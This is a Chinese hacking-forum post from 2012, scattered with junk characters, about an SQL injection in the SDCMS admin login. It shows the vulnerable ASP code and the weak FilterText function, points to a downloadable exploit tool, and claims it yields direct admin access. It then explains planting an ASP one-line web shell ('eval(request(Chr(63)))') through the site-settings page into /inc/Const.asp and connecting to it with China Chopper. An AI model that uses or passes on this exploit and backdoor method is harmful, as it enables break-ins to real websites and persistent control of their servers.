作者:T00LS 鬼哥
) I% H* d& m* @# |" P漏洞文件:后台目录/index.asp
3 P J) q" N" K: W9 S( b: l) C6 B% l
Sub Check
4 i1 J& v* h; F% @, T. p) r Dim username,password,code,getcode,Rs# h/ X' t( c- u+ k3 @
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub7 I, J# x7 G3 @
username=FilterText(Trim(Request.Form("username")),1)
/ d6 c8 {6 @ y' u0 U! F" r password=FilterText(Trim(Request.Form("password")),1)
1 g" j, r2 v' { code=Trim(Request.Form("yzm"))/ y& d. q/ q r+ M; S" @3 h, k
getcode=Session("SDCMSCode")2 N* i7 `% g1 J8 N, l7 J, N, ]0 I
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
- F3 J# l' u+ A5 T IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
1 V' I4 h" |: Y0 R T9 Q. q IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied- l. P# S& z! E, a. t" m
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied- k% d; x3 E* B
IF username="" or password="" Then
* a" j7 k: Y+ N0 u8 u Echo "用户名或密码不能为空"ied
4 [8 m1 k6 `$ |# R Else
. M, u- ^' x5 ?$ ^) }; } Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")5 W" w+ H9 s2 ^
IF Rs.Eof Then
' a. t) ]. y+ D& A- A AddLog username,GetIp,"登录失败",19 |( {7 k4 F: p+ E" ]7 ]' }7 v, I
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
2 b) S3 \, b# U/ V3 ]) ?; B, ^ Else2 o& G+ Y4 f+ P+ J/ t1 X; r+ y; K
Add_Cookies "sdcms_id",Rs(0)
: ]& l: `! [' L& f! F, K) P: U Add_Cookies "sdcms_name",username
, a3 Q6 h3 ~4 Y- H F3 l) b5 m1 R$ w$ Y Add_Cookies "sdcms_pwd",Rs(2)
- d& ^$ G q% g S: A- q Add_Cookies "sdcms_admin",Rs(3)
6 w n5 Q3 u8 t6 Y+ d) Z Add_Cookies "sdcms_alllever",Rs(4)3 `" }' w7 L/ B6 C( S* c
Add_Cookies "sdcms_infolever",Rs(5)
8 y( K. D% E1 c+ [. O$ B Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")4 T* h3 K& `. V7 ]! n/ L. s
AddLog username,GetIp,"登录成功",13 }; L( j; g y) W# W/ r
'自动删除30天前的Log记录
$ |- x' d. G) e% l2 K IF Sdcms_DataType Then
( p. ~' h9 `& J) j! ^& i Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
8 x7 D; e& o( k, Y3 M4 H Else* W i: e' x1 @
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
2 H' X( y+ G5 L6 k# } i5 | End IF
* f3 b3 F" L; n e" R- H$ `8 O Go("sdcms_index.asp")
! s5 @& P; m$ R% a G9 y* m4 V/ e End IF h$ C; \7 p7 s& }: c( C7 {: F
Rs.Close! ?) P, }2 L9 z; `/ ?
Set Rs=Nothing% o7 h/ K: |% W/ S1 ~$ n9 n1 y9 `
End IF( o1 H; A2 l' u
End Sub
! N: Z, i' u4 ]! ~# p/ y6 Z
4 I" c' z0 g- j7 n% }’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码* {5 J7 Z" n# u- ]
/ k; ~: J( z* R7 S; Z
Function FilterText(ByVal t0,ByVal t1)) H5 M6 }+ @( r/ C" Q& b
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function( u( e$ j5 d) |1 Z% Z8 D
t0=Trim(t0)
* W7 [! \) L% w5 W Select Case t1
" l8 i( g r. g! I& _& N( ^ Case "1"' Q/ `! i% n* ?" v9 Z: T' o; f# M, @
t0=Replace(t0,Chr(32),"")
- F/ x4 \4 E" F) d1 }- ]4 Q t0=Replace(t0,Chr(13),"")* n9 u! Z/ y0 B$ V: n- s* s
t0=Replace(t0,Chr(10)&Chr(10),"")' U: g- s) i# @6 @8 y L% [; G8 |
t0=Replace(t0,Chr(10),"")
$ i. L% m! _6 o; @, U" E* ] Case "2"* x' M% u" X' `3 p$ T7 f( K
t0=Replace(t0,Chr(8),"")'回格
) ^4 s4 ]6 O% p7 L7 @! ~ t0=Replace(t0,Chr(9),"")'tab(水平制表符)2 J" k- ^& S4 U/ y' X
t0=Replace(t0,Chr(10),"")'换行
+ v- }$ o. _- u/ K9 ^ t0=Replace(t0,Chr(11),"")'tab(垂直制表符)0 X, A) E: L- @" X# q% ]1 k3 ~
t0=Replace(t0,Chr(12),"")'换页% R1 \3 m7 ]( ` J( m& Y
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
/ D8 U! s0 I- d+ _ t0=Replace(t0,Chr(22),"")
6 h) e1 b, V% Q9 E. x+ A t0=Replace(t0,Chr(32),"")'空格 SPACE
7 a& Q" x+ l, \4 f3 G9 U4 c# e t0=Replace(t0,Chr(33),"")'!
4 t& p" Z% ^" B4 C5 J9 O; I t0=Replace(t0,Chr(34),"")'"9 {0 M3 e2 o7 y ?2 v( I0 f0 [* j
t0=Replace(t0,Chr(35),"")'#8 X( b( t3 [( U2 P; D
t0=Replace(t0,Chr(36),"")'$
7 Y& o7 _" a5 M4 Q" p t0=Replace(t0,Chr(37),"")'%5 y& C9 ~; p3 S# v
t0=Replace(t0,Chr(38),"")'&0 {$ I- L7 `% y0 t
t0=Replace(t0,Chr(39),"")''
# }6 `1 b( @8 @% r+ L. Q t0=Replace(t0,Chr(40),"")'(
* t& C8 q: [% u- J- S& r" { t0=Replace(t0,Chr(41),"")')
4 K$ B u- E. ~# S t0=Replace(t0,Chr(42),"")'*+ {! M( L; |/ w, {' e& h
t0=Replace(t0,Chr(43),"")'+
" A( h. X- L& H, G- D t0=Replace(t0,Chr(44),"")',6 u0 E4 n O$ F4 \
t0=Replace(t0,Chr(45),"")'-
* T v7 q5 ^- t7 b0 ? t0=Replace(t0,Chr(46),"")'.
$ ^. L5 V, Y3 {* B9 {2 s4 @/ U0 z2 y t0=Replace(t0,Chr(47),"")'/ ~. I" g5 {. ?
t0=Replace(t0,Chr(58),"")':
A/ u2 I, C) d0 A5 k( N t0=Replace(t0,Chr(59),"")';7 k3 L [; D1 |. T- a
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
1 F7 b- ]0 ~$ D9 X+ _& X. [* [ t0=Replace(t0,Chr(63),"")'?
# n0 g4 U1 q; P t0=Replace(t0,Chr(64),"")'@
9 S: v! t# x8 Z, { t0=Replace(t0,Chr(91),"")'\
: X+ e3 m# l2 m: S. E- ] t0=Replace(t0,Chr(92),"")'\
* [6 |0 G, Z) K, L. l& R t0=Replace(t0,Chr(93),"")']0 C3 W1 a. |2 L$ L
t0=Replace(t0,Chr(94),"")'^
# B' V- N% d0 K/ a; k9 h t0=Replace(t0,Chr(95),"")'_
) T- f6 y9 m5 q t0=Replace(t0,Chr(96),"")'`3 u; J( I. L% g7 g" @1 Z/ D: \
t0=Replace(t0,Chr(123),"")'{8 `' D; s3 |% u6 b! o
t0=Replace(t0,Chr(124),"")'|" D, O4 w- m. m7 X6 |+ `( a* I* s
t0=Replace(t0,Chr(125),"")'}, y( I9 ]8 y% ?. ^. v6 P
t0=Replace(t0,Chr(126),"")'~7 M: b0 [8 ^; J* u- C
Case Else
- W2 X6 H$ T4 p/ I X t0=Replace(t0, "&", "&")( R- h; S: \: @# b
t0=Replace(t0, "'", "'")
. \( X# |: j6 }3 |" h t0=Replace(t0, """", """)" s# ] L0 }; g& D9 V# l
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
6 I" ^; C% A& R' d+ W End Select
- ^! ^5 M0 g% D% X# `' l$ T IF Instr(Lcase(t0),"expression")>0 Then" I+ E* f9 [- C* _0 T
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
3 x5 a/ c0 @* M1 g3 X End If
8 f3 x1 x2 r6 l3 N" T FilterText=t0
1 I* r+ Z/ N7 L( JEnd Function6 ^2 s* @8 g* O9 c/ b
5 w- d$ z: F& M: k f
看到没。直接参数是1 只过滤7 k* F2 {% h/ h8 x0 a
t0=Replace(t0,Chr(32)," ")
7 u4 _1 G* G, E2 S t0=Replace(t0,Chr(13),"")
* p Q% }7 J, u: S$ q% }7 L t0=Replace(t0,Chr(10)&Chr(10),": X& _, Q1 ^7 S) `7 P
")$ n, y8 U0 O4 q, I. Z1 H1 v" G
t0=Replace(t0,Chr(10),". F0 q! I8 V# d8 [0 [7 B5 j6 H
")6 t% c f2 ^7 n- l
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
) F8 e! \7 d( ~/ v$ Z7 iEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP6 `) B5 K. _' C4 ` J; f+ Q) N
% n, q! s J( P# V8 S/ H; ^0 f4 ]测试:
8 J K; _$ V% ~
+ g) _1 |: Q2 L" E" C1 O9 H. a, l6 f1 E7 z
现在输入工具上验证码,然后点OK
* m% H% k# E7 h9 w# k2 u! ]+ P
+ l3 W, a7 w0 I) w( z) \6 p. Z( Z' h5 D$ t# B
看到我们直接进入后台管理界面了,呵呵!
! `6 X2 P2 D; \6 E% L- ?: ?0 C: G' n4 L1 `# o+ C7 ]
. v y9 @' U+ F6 L& [" F
! n7 z3 k$ R: Z4 p7 K. r这样直接进入后台了。。。。% z l! p. ]# _. \7 D
$ N& h8 J) G. X' ]2 K3 U" D
3 R# e, P! P5 K* b7 d
# a( q# Y; m" K3 w) F4 f6 f3 cSDCMS提权:
4 h1 A4 j9 J- z) Q/ s+ J4 A* c9 r# T8 E% h& B" t
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
- G/ D" l" ?% f! J% ?( F" J1 ^3 p! ]+ ?* [8 D6 D5 S4 N j
) ]) x, l$ c1 v0 |. j2 {8 ~: W2 F" a& {/ y d( D# v. u# a
OK,现在用菜刀连接下!1 p7 d5 D: b$ b) l
$ F+ V2 M; Q# F9 k4 w' g
) D" y% _! D- ]+ {* W0 |- C0 f; D" X9 n- V1 \& L5 j) W9 v5 O
9 j0 G/ {+ { j( ]+ h- h
1 k, u U+ Q- \1 D, Y. i |
发表于 2012-11-9 20:57:02
收藏
支持
反对